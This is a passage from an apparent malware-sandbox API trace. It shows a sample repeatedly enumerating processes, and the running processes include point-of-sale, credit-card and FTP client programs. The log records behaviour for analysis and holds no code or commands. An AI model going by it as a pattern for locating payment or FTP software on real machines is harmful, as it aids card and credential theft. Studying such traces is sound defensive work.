cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0250.717] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0250.719] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0250.721] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0250.724] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0250.726] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0250.728] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0250.767] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0250.772] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0250.775] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0250.778] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0250.780] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0250.782] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0250.784] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0250.786] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0250.788] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0250.790] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0250.791] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0250.793] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0250.795] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.798] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.800] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0250.801] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0250.803] Process32Next (in: hSnapshot=0x2330, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0250.808] CloseHandle (hObject=0x2330) returned 1 [0250.808] Sleep (dwMilliseconds=0x64) [0250.913] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2340 [0250.931] Process32First (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.934] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.936] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.939] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.944] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.947] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.949] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.964] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.966] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.968] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.970] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.972] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.974] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.976] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.978] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.979] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.982] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.984] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.986] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.987] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.989] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0250.991] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.992] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0250.994] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.997] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0250.998] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0251.029] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0251.031] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0251.033] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0251.035] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0251.037] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.038] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.103] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0251.106] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.110] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.113] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0251.115] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0251.117] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0251.120] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0251.122] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0251.125] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0251.194] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0251.197] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0251.200] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0251.203] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0251.205] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0251.207] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0251.210] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0251.213] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0251.215] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0251.217] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0251.220] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0251.222] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0251.225] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0251.227] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0251.298] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0251.300] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0251.303] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0251.306] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0251.308] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0251.311] Process32Next (in: hSnapshot=0x2340, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0251.314] 